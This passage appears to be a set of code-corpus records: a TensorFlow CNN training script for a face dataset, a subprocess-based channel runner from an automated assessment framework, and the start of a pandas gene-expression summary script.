Before start using this, please select `Cell` - `All Output` - `Clear` to clear the old results. 
See [TensorFlow Tutorial](https://www.tensorflow.org/versions/master/tutorials/mnist/beginners/index.html) for details of the tutorial.\n\n# # Loading MNIST training data\n# \n\n# In[1]:\n\n# Import tensorflow\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n# import MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib.learn.python.learn.datasets import base\n#mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import random_seed\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\n# class DataSet(object):\n\n# def __init__(self,\n# images,\n# labels,\n# fake_data=False,\n# one_hot=False,\n# dtype=dtypes.float32,\n# reshape=True,\n# seed=None):\n# \"\"\"Construct a DataSet.\n# one_hot arg is used only if fake_data is true. `dtype` can be either\n# `uint8` to leave the input as `[0, 255]`, or `float32` to rescale into\n# `[0, 1]`. Seed arg provides for convenient deterministic testing.\"\"\"\n# seed1, seed2 = random_seed.get_seed(seed)\n# # If op level seed is not set, use whatever graph level seed is returned\n# np.random.seed(seed1 if seed is None else seed2)\n# dtype = dtypes.as_dtype(dtype).base_dtype\n# if dtype not in (dtypes.uint8, dtypes.float32):\n# raise TypeError('Invalid image dtype %r, expected uint8 or float32' %\n# dtype)\n# if fake_data:\n# self._num_examples = 10000\n# self.one_hot = one_hot\n# else:\n# assert images.shape[0] == labels.shape[0], (\n# 'images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\n# self._num_examples = images.shape[0]\n\n# # Convert shape from [num examples, rows, columns, depth]\n# # to [num examples, rows*columns] (assuming depth == 1)\n# if reshape:\n# assert images.shape[3] == 1\n# images = images.reshape(images.shape[0],\n# images.shape[1] * images.shape[2])\n# if dtype == dtypes.float32:\n# # Convert from [0, 255] -> [0.0, 1.0].\n# #images = images.astype(np.float32)\n# images = np.multiply(images, 1.0 / 255.0)\n# self._images = images\n# self._labels = labels\n# self._epochs_completed = 0\n# self._index_in_epoch = 0\n\n# @property\n# def images(self):\n# return self._images\n\n# @property\n# def labels(self):\n# return self._labels\n\n# @property\n# def num_examples(self):\n# return self._num_examples\n\n# @property\n# def epochs_completed(self):\n# return self._epochs_completed\n\n# def next_batch(self, batch_size, fake_data=False, shuffle=True):\n# \"\"\"Return the next `batch_size` examples from this data set.\"\"\"\n# if fake_data:\n# fake_image = [1] * 6020\n# if self.one_hot:\n# fake_label = [1] + [0] * 9\n# else:\n# fake_label = 0\n# return [fake_image for _ in xrange(batch_size)], [\n# fake_label for _ in xrange(batch_size)]\n# start = self._index_in_epoch\n# # Shuffle for the first epoch\n# if self._epochs_completed == 0 and start == 0 and shuffle:\n# perm0 = np.arange(self._num_examples)\n# np.random.shuffle(perm0)\n# self._images = self.images[perm0]\n# self._labels = self.labels[perm0]\n# # Go to the next epoch\n# if start + batch_size > self._num_examples:\n# # Finished epoch\n# self._epochs_completed += 1\n# # Get the rest examples in this epoch\n# rest_num_examples = self._num_examples - start\n# images_rest_part = self._images[start:self._num_examples]\n# labels_rest_part = self._labels[start:self._num_examples]\n# # Shuffle the data\n# if shuffle:\n# perm = np.arange(self._num_examples)\n# np.random.shuffle(perm)\n# 
self._images = self.images[perm]\n# self._labels = self.labels[perm]\n# # Start next epoch\n# start = 0\n# self._index_in_epoch = batch_size - rest_num_examples\n# end = self._index_in_epoch\n# images_new_part = self._images[start:end]\n# labels_new_part = self._labels[start:end]\n# return np.concatenate((images_rest_part, images_new_part), axis=0) , np.concatenate((labels_rest_part, labels_new_part), axis=0)\n# else:\n# self._index_in_epoch += batch_size\n# end = self._index_in_epoch\n# return self._images[start:end], self._labels[start:end]\n\n\n# def read_data_sets(fake_data=False,\n# one_hot=False,\n# dtype=dtypes.float32,\n# reshape=True,\n# validation_size=5000,\n# seed=None):\n# if fake_data:\n\n# def fake():\n# return DataSet(\n# [], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)\n\n# train = fake()\n# validation = fake()\n# test = fake()\n# return base.Datasets(train=train, validation=validation, test=test)\n \n# TRAIN = '/data/face_dataset/train/'\n# TEST = '/data/face_dataset/test/'\n# def read_images(direc, test=False):\n \n# pids = os.listdir(direc)\n# images = [] \n# labels = []\n# for pid in pids:\n# if test: \n# labels.append(pid) #TODO PID is a filename here \n# images.append(imread(direc + pid, dtype=np.uint8))\n# else: \n# for image_file in os.listdir(direc + pid):\n# #imagefiles.append(image_file)\n# labels.append(pid)\n# images.append(imread(direc + pid + '/' + image_file))\n \n# #print(images)\n# return np.array(images), np.array(labels)\n \n\n# train_images, train_labels = read_images(TRAIN)\n# test_images, test_labels = read_images(TEST, test=True)\n \n \n \n# if not 0 <= validation_size <= len(train_images):\n# raise ValueError(\n# 'Validation size should be between 0 and {}. Received: {}.'\n# .format(len(train_images), validation_size))\n\n# validation_images = train_images[:validation_size]\n# validation_labels = train_labels[:validation_size]\n# train_images = train_images[validation_size:]\n# train_labels = train_labels[validation_size:]\n\n\n# options = dict(dtype=dtypes.uint8, reshape=False, seed=seed)\n\n# train = DataSet(train_images, train_labels, **options)\n# validation = DataSet(validation_images, validation_labels, **options)\n# test = DataSet(test_images, test_labels, **options)\n\n# return base.Datasets(train=train, validation=validation, test=test)\n\n\n# In[3]:\n\n# data = read_data_sets()\n\n\n# In[4]:\n\n# mnist = data\n\n\n# In[5]:\n\n# data.train.images\n\n\n# In[6]:\n\nTRAIN = '/data/face_dataset/train/'\nTEST = '/data/face_dataset/test/'\ndef read_images(direc, test=False):\n\n pids = os.listdir(direc)\n images = [] \n labels = []\n for pid in pids:\n if test: \n labels.append(pid) #TODO PID is a filename here \n images.append(direc + pid)\n else: \n for image_file in os.listdir(direc + pid):\n #imagefiles.append(image_file)\n labels.append(int(pid))\n images.append(direc + pid + '/' + image_file)\n\n #print(images)\n return np.array(images), np.array(labels)\n\n\ntrain_images, train_labels = read_images(TRAIN)\ntest_images, test_labels = read_images(TEST, test=True)\n\n\n# In[7]:\n\n#Reads an image from a file, decodes it into a dense tensor, and resizes it\n# to a fixed shape.\nlabel_order = train_labels.copy()\nlabel_order = set(label_order)\nlabel_order = sorted(list(label_order))\n\ndef _parse_function(filename, label):\n image_string = tf.read_file(filename)\n image_decoded = tf.image.decode_image(image_string)\n image_decodes = tf.divide(tf.to_float(image_decoded), tf.constant(255.0))\n #print(image_decoded)\n 
#image_resized = tf.image.resize_images(image_decoded, [64, 64])\n# y_arr = np.zeros([398])\n# ind = label_order.index(label)\n# y_arr[ind] = 1\n# print(y_arr)\n \n return tf.reshape(image_decoded, [-1, 12288]), label\n\n# A vector of filenames.\n#filenames = tf.constant(imagefiles)\n\n# `labels[i]` is the label for the image in `filenames[i].\n#labels = tf.constant(labels)\n\ndataset_train = tf.data.Dataset.from_tensor_slices((tf.constant(train_images), tf.constant(train_labels)))\ndataset_train = dataset_train.map(_parse_function)\n\ndataset_test = tf.data.Dataset.from_tensor_slices((tf.constant(test_images), tf.constant(test_labels)))\ndataset_test = dataset_test.map(_parse_function) \n\n\n# In[8]:\n\n#mnist = dataset_train\n\n\n\n# # Build a Multilayer Convolutional Network\n# \n# Getting 91% accuracy on MNIST is bad. It's almost embarrassingly bad. In this section, we'll fix that, jumping from a very simple model to something moderately sophisticated: a small convolutional neural network. This will get us to around 99.2% accuracy -- not state of the art, but respectable.\n\n# In[9]:\n\nx = tf.placeholder(tf.float32, [None, 12288])\nW = tf.Variable(tf.zeros([12288, 398]))\nb = tf.Variable(tf.zeros([398]))\ny_ = tf.placeholder(tf.float32, [None, 398])\n\n\n# ## Weight & Biases Initialization\n# \n# To create this model, we're going to need to create a lot of weights and biases. One should generally initialize weights with a small amount of noise for symmetry breaking, and to prevent 0 gradients. Since we're using ReLU neurons, it is also good practice to initialize them with a slightly positive initial bias to avoid \"dead neurons.\" Instead of doing this repeatedly while we build the model, let's create two handy functions to do it for us.\n\n# In[10]:\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n# ## Convolution & Pooling\n# \n# TensorFlow also gives us a lot of flexibility in convolution and pooling operations. How do we handle the boundaries? What is our stride size? In this example, we're always going to choose the vanilla version. Our convolutions uses a stride of one and are zero padded so that the output is the same size as the input.\n# \n# ![](http://deeplearning.stanford.edu/wiki/images/6/6c/Convolution_schematic.gif)\n# \n# http://deeplearning.stanford.edu/wiki/index.php/Feature_extraction_using_convolution\n# \n# Our pooling is plain old max pooling over 2x2 blocks. To keep our code cleaner, let's also abstract those operations into functions.\n# \n# ![](http://www.wildml.com/wp-content/uploads/2015/11/Screen-Shot-2015-11-05-at-2.18.38-PM.png)\n# \n# ![](http://colah.github.io/posts/2014-07-Conv-Nets-Modular/img/Conv-9-Conv2Max2Conv2.png)\n# \n# http://colah.github.io/posts/2014-07-Conv-Nets-Modular/\n\n# In[11]:\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\n# ## First Convolutional Layer\n# \n# We can now implement our first layer. It will consist of convolution, followed by max pooling. The convolutional will compute 32 features for each 5x5 patch. Its weight tensor will have a shape of [5, 5, 1, 32]. The first two dimensions are the patch size, the next is the number of input channels, and the last is the number of output channels. 
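\n# \n# Note: the [5, 5, 1, 32] shape above comes from the grayscale MNIST tutorial text; the face images used in this script are RGB (3 input channels), so the first convolution below uses weights of shape [5, 5, 3, 32].\n# \n# 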
We will also have a bias vector with a component for each output channel.\n\n# In[12]:\n\nW_conv1 = weight_variable([5, 5, 3, 32])\nb_conv1 = bias_variable([32])\n\n\n# To apply the layer, we first reshape x to a 4d tensor, with the second and third dimensions corresponding to image width and height, and the final dimension corresponding to the number of color channels.\n\n# In[13]:\n\nx_image = tf.reshape(x, [-1,64,64,3])\n\n\n# We then convolve x_image with the weight tensor, add the bias, apply the ReLU function, and finally max pool.\n\n# In[14]:\n\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\nh_pool1 = max_pool_2x2(h_conv1)\n\n\n# ## Second Convolutional Layer\n# \n# In order to build a deep network, we stack several layers of this type. The second layer will have 64 features for each 5x5 patch.\n\n# In[15]:\n\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\n\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\nh_pool2 = max_pool_2x2(h_conv2)\n\n\n# ## Densely Connected Layer\n# \n# Now that the image size has been reduced to 7x7, we add a fully-connected layer with 1024 neurons to allow processing on the entire image. We reshape the tensor from the pooling layer into a batch of vectors, multiply by a weight matrix, add a bias, and apply a ReLU.\n\n# In[16]:\n\nW_fc1 = weight_variable([16 * 16 * 64, 1024])\nb_fc1 = bias_variable([1024])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 16*16*64])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n\n# ### Dropout\n# \n# To reduce overfitting, we will apply dropout before the readout layer. We create a placeholder for the probability that a neuron's output is kept during dropout. This allows us to turn dropout on during training, and turn it off during testing. TensorFlow's tf.nn.dropout op automatically handles scaling neuron outputs in addition to masking them, so dropout just works without any additional scaling.\n\n# In[17]:\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) #don't start with this, its hard \n\n\n# ## Readout Layer\n# \n# Finally, we add a softmax layer, just like for the one layer softmax regression.\n\n# In[18]:\n\nW_fc2 = weight_variable([1024, 398])\nb_fc2 = bias_variable([398])\n\ny_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n\n# ## Train and Evaluate the Model\n# \n# How well does this model do? To train and evaluate it we will use code that is nearly identical to that for the simple one layer SoftMax network above. 
The differences are that: we will replace the steepest gradient descent optimizer with the more sophisticated ADAM optimizer; we will include the additional parameter keep_prob in feed_dict to control the dropout rate; and we will add logging to every 100th iteration in the training process.\n# \n# \n\n# In[ ]:\n\n# initialize variables and session\n# init = tf.global_variables_initializer()\n# sess = tf.Session()\n# sess.run(init)\n\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))\n\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n# sess.run(tf.initialize_all_variables())\n \nBATCH_SIZE = 100 \n\nbatch = dataset_train.batch(BATCH_SIZE) #TODO \nitera = batch.make_one_shot_iterator()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n # Run mini-batch training on 100 elements 20000 times.\n for i in range(20000):\n t = sess.run(itera.get_next())\n #print(t[0][0], t[1])\n\n #encoding \n y_arr = np.zeros([BATCH_SIZE, 398])\n for j in range(BATCH_SIZE):\n ind = label_order.index(t[1][j])\n y_arr[j][ind] = 1\n #print(j)\n #y_arr = np.reshape(y_arr, [-1, 398])\n #print(t[0].reshape(BATCH_SIZE, 12288)/255.0)\n if i%10 == 0:\n #print(batch[0])\n train_accuracy = accuracy.eval(feed_dict={\n x:t[0].reshape(BATCH_SIZE, 12288)/255.0, y_: y_arr, keep_prob: 1.0})\n #print(i)\n# train_accuracy = sess.run(accuracy, feed_dict={\n# x:t[0].reshape(BATCH_SIZE, 12288), y_: y_arr, keep_prob: 1.0})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n #print(i)\n # train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n #sess.run(itera.get_next())\n# sess.run(train_step, feed_dict={x: t[0].reshape(BATCH_SIZE, 12288) , y_: y_arr, keep_prob: 0.5})\n train_step.run(feed_dict={x: t[0].reshape(BATCH_SIZE, 12288)/255.0 , y_: y_arr, keep_prob: 0.5})\n #print(i, \"Completed epoch\")\n # todo run the test data \n # plug it in \n\n\n\n #print(\"test accuracy %g\" % sess.run(accuracy, feed_dict={\n # x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\n# In[ ]:\n\n\n\n\n# The final test set accuracy after running this code should be approximately 99.2%.\n# \n# We have learned how to quickly and easily build, train, and evaluate a fairly sophisticated deep learning model using TensorFlow.\n# \n# 1: For this small convolutional network, performance is actually nearly identical with and without dropout. 
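\n# \n# To make the scaling behaviour of tf.nn.dropout described above concrete (an illustrative aside, not from the original tutorial text): with keep_prob = 0.5, roughly half of the activations are zeroed and the survivors are multiplied by 1/keep_prob = 2, e.g. [0.2, 0.4, 0.6, 0.8] may become [0.4, 0.0, 1.2, 0.0], so the expected activation is unchanged and no extra rescaling is needed when dropout is disabled at test time.\n# \n# 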
Dropout is often very effective at reducing overfitting, but it is most useful when training very large neural networks.\n\n# # Visualizing with TensorBoard\n# \n# Visualize with [TensorBoard](https://www.tensorflow.org/tensorboard/index.html).\n\n# ![](https://www.tensorflow.org/versions/master/images/mnist_tensorboard.png)\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"CNN3.py","file_name":"CNN3.py","file_ext":"py","file_size_in_byte":17762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"629411285","text":"from moduls.schemaSpecificAttr import *\nfrom moduls.exceptions import *\nfrom moduls.resultContent import resultContent as rs\n\nimport collections\nimport subprocess\nimport select\nimport re\nimport time\n\n'''\nChannel Module\nThis module can initialize channels and run them, based on resultContent.getScripts()\nopenFileWithCheckFn : function reference to the dataStore instance's openFileWithCheck function\n'''\nclass channel:\n def __init__(self,resultContent, logger, InputChStreamValidFn, chStringValidFn, openFileWithCheckFn):\n '''\n Initialize channels and fill their input streams\n '''\n self.channels = collections.defaultdict(list)\n self.resultContent = resultContent\n self.logger = logger\n self.openList = []\n # input channel schema validation function reference\n self.chStringValidFn = chStringValidFn\n\n for script in self.resultContent.getScripts():\n if CH_INPUT_TYPE in script:\n if script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[0]:\n # inputstream from exercise.X.xml object's tasks\n script['taskInput'] = self.__xmlTaskInputToList(self.resultContent.getAll(tag=CH_INPUTSTREAM,attrName=SOLUTION_CH_NAME,attrValue=script[CHANNEL_NAME_ATTR]))\n elif script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[1]:\n if CH_EXT_PATH not in script:\n raise AKEPException(ERROR['SCRIPT']['MISSING_PATH']+script[CHANNEL_NAME_ATTR])\n # load external file data ..\n data = openFileWithCheckFn(script[CH_EXT_PATH], InputChStreamValidFn)\n if data is None:\n raise AKEPException(ERROR['GENERAL']['PERMISSON'] +'read file or '+ ERROR['FILE']['INVALID']+script[CH_EXT_PATH])\n # .. with binding keys\n data = self.resultContent.keyBinding(data)\n # .. 
to inputstream\n script['taskInput'] = self.__xmlTaskInputToList(self.resultContent.getAll(element=data, tag=TASKTAG),False)\n elif script[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[2]:\n if FROM_CAHNNEL not in script:\n # if inputType is fromChannel and the script tag does not have a sourceChannel attr\n raise AKEPException(ERROR['SCRIPT']['NOT_VALID_VALUE'].format(FROM_CAHNNEL,script[CHANNEL_NAME_ATTR]))\n else:\n # inputType does not exist\n raise AKEPException(ERROR['SCRIPT']['NOT_VALID_VALUE'].format('inputType',script[CHANNEL_NAME_ATTR]))\n \n # the channel's inner inputstream is used to write initial content before taskInput; after a script error this content will be used as input again\n # and taskInput restarts after the error phase\n script[CH_INPUTSTREAM] = []\n for inputNode in self.resultContent.getAll(tag=CH_INPUTSTREAM,element=script['node'],direct=True):\n script[CH_INPUTSTREAM].append(inputNode.text)\n if len(script[CH_INPUTSTREAM]) == 0:\n del script[CH_INPUTSTREAM]\n self.channels[script[ENTRY_ATTR]].append(script)\n\n def __xmlTaskInputToList(self,elements,inlineType=True):\n '''\n If inputstreams are used in tasks and there is at least one channel with the inner inputType,\n this function converts these task inputstreams into a channel inputstream\n '''\n inputs = []\n for inputNode in elements:\n taskID = rs.getAttrValue(rs.getParent(inputNode) if inlineType else inputNode,TASK_ELEMENT_ID)\n children = rs.getChildren(inputNode)\n if len(children) == 0:\n # only text\n inputs.append({'taskID':taskID,'input':rs.getText(inputNode)})\n else:\n # contains elements\n inputstream = ''\n for child in children:\n inputstream += rs.toStringFromElement(child).decode('utf-8')\n inputs.append({'taskID':taskID,'input':inputstream})\n return inputs\n\n def run(self):\n '''\n Run all channels in the defined order\n '''\n order = CH_ENTRY_ORDER\n for entry in order:\n for ch in self.channels[entry]:\n # create taskinput and inputstream\n if 'taskInput' in ch:\n taskInput = SEPARATOR_COMMUNICATE_TASK_END.join(inputItem['input'] for inputItem in ch['taskInput'])\n inputstream = '\\n'.join(ch[CH_INPUTSTREAM]) if CH_INPUTSTREAM in ch else '' \n \n if CH_INPUT_TYPE in ch and ch[CH_INPUT_TYPE] == SCRIPT_INPUT_TYPE[2]:\n refChOut = self.__getChannel(ch[FROM_CAHNNEL])\n if refChOut == None or 'out' not in refChOut or refChOut['out'] == '':\n raise AKEPException(ERROR['NOT_FIND']['CH_OR_CHOUT'].format(ch[FROM_CAHNNEL],ch[CHANNEL_NAME_ATTR]))\n output = str(refChOut['out'])\n if CH_INPUTTO in ch:\n ch['arguments'] = ch['arguments'].replace(ch[CH_INPUTTO],output)\n if inputstream != '':\n inputstream = inputstream.replace(ch[CH_INPUTTO],output)\n else:\n inputstream = (inputstream+'\\n'+output) if inputstream != '' else output\n \n concatInnerInputToTaskInp = '' if inputstream == '' else inputstream + SEPARATOR_COMMUNICATE_TASK_END\n \n arguments = (ch[CH_PATH]+' '+ch['arguments']).split()\n ch['out'] = None\n ch['error'] = None\n again = True\n while again:\n again = False\n ch['errorType'] = ''\n ch['start'] = str(time.time())\n try:\n self.logger.info('Channel {} start'.format(ch[CHANNEL_NAME_ATTR]))\n self.logger.debug('Channel arguments: {} inputstream: {}'.format(ch['arguments'],inputstream if 'taskInput' not in ch else (concatInnerInputToTaskInp + taskInput)))\n if entry == CH_ENTRY_ORDER[1]:\n proc = subprocess.Popen(arguments, stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)\n if inputstream != '': \n proc.stdin.write(inputstream)\n proc.stdin.close()\n poll_obj = select.poll()\n result = 
''\n # the continuous type can trigger the next item in the chain if the channel has CH_CHAIN_CONT_COND\n if CH_CHAIN_CONT_COND in ch:\n if ch[CH_CHAIN_CONT_COND] == CH_CHAIN_CONT_COND_TYPE[1]: \n poll_obj.register(proc.stderr, select.POLLIN)\n if poll_obj.poll(CH_CON_TYPE_ANSWER_TIMEOUT):\n result = proc.stderr.readline()\n else:\n raise subprocess.TimeoutExpired(None,None)\n elif ch[CH_CHAIN_CONT_COND] == CH_CHAIN_CONT_COND_TYPE[0]:\n poll_obj.register(proc.stdout, select.POLLIN)\n if poll_obj.poll(CH_CON_TYPE_ANSWER_TIMEOUT):\n result = proc.stdout.readline()\n else:\n raise subprocess.TimeoutExpired(None,None)\n self.openList.append({'proc':proc,'chName':ch[CHANNEL_NAME_ATTR], 'entry':entry})\n if proc.poll() is not None or 'error' in result.lower() or 'traceback' in result.lower():\n raise subprocess.SubprocessError('Continuous channel is dead')\n else:\n # run subprocess\n proc = subprocess.Popen(arguments,stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE, universal_newlines=True)\n self.openList.append({'proc':proc,'chName':ch[CHANNEL_NAME_ATTR],'entry':entry})\n out, error = proc.communicate(input=(inputstream if 'taskInput' not in ch else (concatInnerInputToTaskInp + taskInput)),timeout=60)\n self.logger.info('Channel {} stop'.format(ch[CHANNEL_NAME_ATTR]))\n if proc.poll() != 0:\n raise subprocess.SubprocessError(error)\n if CH_OUT_TASK_TYPE in ch:\n ch['out'] = self.chStringValidFn(re.sub('set feedback (on|off)','',re.sub('--.*\\n','',out[out.find('<tasks>'):out.find('</tasks>')+8].replace('prompt','')),flags=re.DOTALL))\n else: \n ch['out'],lastRightIndex = self.__createChannelOutputToTaskXML(ch['taskInput'],out,ch['out'],concatInnerInputToTaskInp) if 'taskInput' in ch else (out,None)\n ch['error'],nothing = self.__createChannelOutputToTaskXML(ch['taskInput'],error,ch['error'],concatInnerInputToTaskInp) if 'taskErrorHandle' in ch else (error,None)\n self.logger.debug('channel: {} out: {}'.format(ch[CHANNEL_NAME_ATTR], rs.toStringFromElement(ch['out']).decode('utf-8') if rs.isElementType(ch['out']) else ch['out'])) \n except FileNotFoundError:\n ch['stop'] = str(time.time())\n ch['errorType'] = 'Script not found'\n self.terminateChannelScripts()\n raise AKEPException(ERROR['FILE']['NOT_FIND']+ch[CHANNEL_NAME_ATTR])\n except subprocess.TimeoutExpired:\n ch['errorType'] = 'Channel time out'\n ch['stop'] = str(time.time())\n proc.kill()\n raise AKEPException(ERROR['SCRIPT']['TIME_EXPIRED']+ ch[CHANNEL_NAME_ATTR])\n except PermissionError:\n ch['stop'] = str(time.time())\n raise AKEPException(ERROR['GENERAL']['PERMISSON'] + 'script: '+ch[CHANNEL_NAME_ATTR])\n except (subprocess.SubprocessError, subprocess.CalledProcessError) as err:\n if 'taskInput' in ch:\n ch['errorType'] = '[ReRUN] Call- or subprocess error' \n self.logger.exception('Error in script: '+ch[CHANNEL_NAME_ATTR])\n # create a new run environment with the content after the error\n ch['out'], lastRightIndex = self.__createChannelOutputToTaskXML(ch['taskInput'],out,ch['out'],concatInnerInputToTaskInp)\n ch['out'].append(rs.createElement(TASKTAG,{TO_ELEMENT_ERROR_ATTR:str(err),TASK_ELEMENT_ID:ch['taskInput'][lastRightIndex+1]['taskID']}))\n if 'taskErrorHandle' in ch:\n ch['error'] = self.__createChannelOutputToTaskXML(ch['taskInput'],str(err),ch['error'],concatInnerInputToTaskInp)\n errorTag,nothing = rs.createElement(TASKTAG,{TASK_ELEMENT_ID:ch['taskInput'][lastRightIndex+1]['taskID']})\n ch['error'].append(errorTag)\n if lastRightIndex+1 < len(ch['taskInput'])-1 and NO_CONTINUE_AFTER_ERROR not in ch and 'CRITICAL' not in str(err):\n 
taskInput = SEPARATOR_COMMUNICATE_TASK_END.join([ch['taskInput'][index]['input'] for index in range(lastRightIndex+2,len(ch['taskInput']))])\n again = True\n else:\n ch['errorType'] = 'Call- or subprocess error'\n ch['stop'] = str(time.time())\n raise AKEPException('Error in script: '+ ch[CHANNEL_NAME_ATTR])\n ch['stop'] = str(time.time())\n self.terminateChannelScripts()\n\n def __getChannel(self,name):\n for entry in self.channels:\n for ch in self.channels[entry]:\n if ch[CHANNEL_NAME_ATTR] == name:\n return ch\n raise AKEPException('Could not find channel {}'.format(name))\n\n def getChannelTaskOutput(self,channelName,taskID,shouldError):\n '''\n Public function to get channel task content\n return: text content, plus shouldError if there was an error, otherwise not shouldError\n '''\n ch = self.__getChannel(channelName)\n if rs.isElementType(ch['out']):\n # first, try to check the error output from ch['error'] in case the preprocessor handles the errors\n if 'taskErrorHandle' in ch and shouldError:\n errorToTask = self.resultContent.get(element=ch['error'], tag=TASKTAG, attrName='n', attrValue=taskID)\n if errorToTask is not None:\n return (rs.getText(errorToTask),shouldError)\n\n task = self.resultContent.get(element=ch['out'], tag=TASKTAG, attrName='n', attrValue=taskID) \n if task is None:\n return (None, shouldError)\n # .. then check the errors which are caught by AKEP\n if rs.getAttrValue(task,TO_ELEMENT_ERROR_ATTR) is not None:\n return rs.getAttrValue(task,TO_ELEMENT_ERROR_ATTR),shouldError\n # finally, there was no error\n return (rs.getText(task),not shouldError)\n return (ch['out'],True)\n \n def __createChannelOutputToTaskXML(self,taskInputStream,xmlTextList,prevXML,concatInnerInputToTaskInp):\n '''\n Create channel (xml format) output from separated plain text\n Handles the error state via the second element of the result\n return: xml format tasks output, last valid task index from taskInputStream\n '''\n tasks = xmlTextList.strip().strip(SEPARATOR_COMMUNICATE_TASK_END).split(SEPARATOR_COMMUNICATE_TASK_END)\n\n if concatInnerInputToTaskInp != '' and len(tasks) > 0:\n # delete the output which belongs to the initial inputstream (if it exists)\n del tasks[0]\n if len(tasks) == 0 or tasks[0] == '':\n # return only prevXML if there is no new content after the error\n return (prevXML,len(prevXML)-1) if prevXML is not None else (rs.createElement('tasks'),-1)\n\n prevInd = len(prevXML) if prevXML is not None else 0\n\n try: \n xmlText = '<tasks>'+''.join(['<task n=\"'+taskInputStream[prevInd+index]['taskID']+'\">'+tasks[index]+'</task>' for index in range(0,len(tasks))])+'</tasks>'\n except IndexError as err:\n self.logger.debug('PrevInd:{}\\nrequiredTaskLen:{}\\nTaskLen{}\\nTasks{}'.format(prevInd,len(taskInputStream),len(tasks),'\\n---------------'.join(tasks)))\n raise AKEPException(str(err))\n\n # create the result xml if it is valid channel output\n tasksXML = self.chStringValidFn(xmlText)\n\n # return the result xml and the last valid index\n if prevXML is None:\n return (tasksXML, len(tasks)-1)\n for task in tasksXML:\n rs.appendTo(task,prevXML)\n return (prevXML,prevInd+len(tasks)-1)\n\n def terminateChannelScripts(self, killIt=False):\n '''\n Public function to terminate/kill opened subprocesses\n '''\n if hasattr(self,'openList'):\n for item in self.openList:\n if not killIt:\n self.logger.debug('Channel: {} returnCode {}'.format(item['chName'],item['proc'].poll()))\n if item['proc'].poll() is None:\n if killIt:\n item['proc'].kill()\n self.logger.info('Channel {} killed'.format(item['chName'])) \n else:\n item['proc'].terminate() \n self.logger.info('Channel {} 
terminated'.format(item['chName']))","sub_path":"src/framework/moduls/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":16381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"539508024","text":"import pandas as pd\nfrom pandas import DataFrame\nimport fire\nfrom pathlib import Path\nimport numpy as np\n\n\ndef exp_summary_group_num(exp_table, group_inf, exp_cutoff,\n out_dir, prefix):\n exp_df = pd.read_table(exp_table)\n m_exp_df = exp_df.melt(id_vars='Gene_id',\n value_name='circ_count',\n var_name='sample_id')\n m_exp_df = m_exp_df[m_exp_df.circ_count > exp_cutoff]\n group_df = pd.read_table(group_inf,\n header=None,\n names=['group_id', 'sample_id'])\n m_exp_df = m_exp_df.merge(group_df)\n g_exp_df = m_exp_df.loc[:, ['Gene_id', 'group_id']].drop_duplicates()\n gene_summary1 = g_exp_df.Gene_id.value_counts()\n tmp_gene_summary2 = g_exp_df.groupby(['Gene_id'])['group_id'].unique()\n gene_summary2 = tmp_gene_summary2.map(','.join)\n gene_summary1.name = 'group_count'\n gene_summary2.name = 'group_name'\n gene_summary = pd.concat([gene_summary1, gene_summary2],\n axis=1, sort=True)\n group_summary1 = g_exp_df.group_id.value_counts()\n solo_exp_genes = gene_summary1[gene_summary1 == 1].index\n solo_exp_df = m_exp_df[m_exp_df.Gene_id.isin(solo_exp_genes)]\n group_summary2 = solo_exp_df.group_id.value_counts()\n group_summary1.name = 'exp'\n group_summary2.name = 'exclusive_exp'\n group_summary = pd.concat([group_summary1, group_summary2],\n axis=1, sort=True)\n group_summary.loc[:, 'exp_portion'] = group_summary.exp / \\\n len(gene_summary)\n group_summary.loc[\n :, 'exclusive_exp_portion'] = group_summary.exclusive_exp / \\\n len(gene_summary)\n out_dir = Path(out_dir)\n if not out_dir.exists():\n out_dir.mkdir()\n gene_summary_file = out_dir / f'{prefix}.gene.exp.summary.txt'\n gene_summary.index.name = 'gene_id'\n 